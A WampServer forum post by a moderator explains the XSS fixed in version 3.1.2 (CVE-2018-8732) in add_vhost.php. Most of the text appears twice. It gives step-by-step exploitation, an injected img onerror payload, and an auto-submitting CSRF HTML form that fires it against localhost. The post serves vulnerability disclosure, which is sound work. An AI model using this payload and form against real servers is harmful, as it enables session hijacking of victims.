WampServer
Apache, PHP, MySQL
on Windows
3.1.2 update and XSS vulnerability
Posted by:
Otomatic
(Moderator)
Date: March 19, 2018 04:53PM
Hi,
With the update changelog 3.1.2 you could read :
- Fix security vulnerability found by Vipin Chaudhary in add_vhost.php page - CVE ID is CVE-2018-8732
Cross site scripting (XSS) even if the server and localhost use the Apache "Require local" directive.
This vulnerability is fixed with this update 3.1.2, but how was it possible.
XSS: Reflected cross site scripting is remotely exploitable.
How to exploit this XSS vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Go to Supress Virtual host and select one to delete and then intercept the request using burp suite or any other proxy tool
3. Change the value of parameter *virtual_del[] *to "><img src=x onerror=alert(1)> and forward it then you will see the XSS triggered.
How to see it:
1. Copy and paste this CSRF request in notepad and save it as anything.html
2. Make sure your wamp server is running and then open the saved html page in mozilla firefox and you will see XSS triggered.
Here, it is only a question of showing the existence of this vulnerability by displaying an alert window. But, instead of displaying this window, the malefactor, when the victim clicks on the link and the XSS is triggered, can perform session hijacking and other attacks.
---------------------------------------------------------------
Documentation Apache - Documentation PHP - Documentation MySQL - Wampserver install files & addons
Edited 1 time(s). Last edit at 03/19/2018 05:58PM by Otomatic.
With the update changelog 3.1.2 you could read :
- Fix security vulnerability found by Vipin Chaudhary in add_vhost.php page - CVE ID is CVE-2018-8732
Cross site scripting (XSS) even if the server and localhost use the Apache "Require local" directive.
This vulnerability is fixed with this update 3.1.2, but how was it possible.
XSS: Reflected cross site scripting is remotely exploitable.
How to exploit this XSS vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Go to Supress Virtual host and select one to delete and then intercept the request using burp suite or any other proxy tool
3. Change the value of parameter *virtual_del[] *to "><img src=x onerror=alert(1)> and forward it then you will see the XSS triggered.
How to see it:
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="[localhost]; name="wamp_csrf" method="POST">
<input type="hidden" name="virtual_del[]" value=""><img src=x onerror=alert(1)>" />
<input type="hidden" name="vhostdelete" value="Suppress VirtualHost" />
</form>
</body>
</html>
Warning: action="[localhost] is action='http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by double quote("2. Make sure your wamp server is running and then open the saved html page in mozilla firefox and you will see XSS triggered.
Here, it is only a question of showing the existence of this vulnerability by displaying an alert window. But, instead of displaying this window, the malefactor, when the victim clicks on the link and the XSS is triggered, can perform session hijacking and other attacks.
---------------------------------------------------------------
Documentation Apache - Documentation PHP - Documentation MySQL - Wampserver install files & addons
Edited 1 time(s). Last edit at 03/19/2018 05:58PM by Otomatic.
Sorry, only registered users may post in this forum.
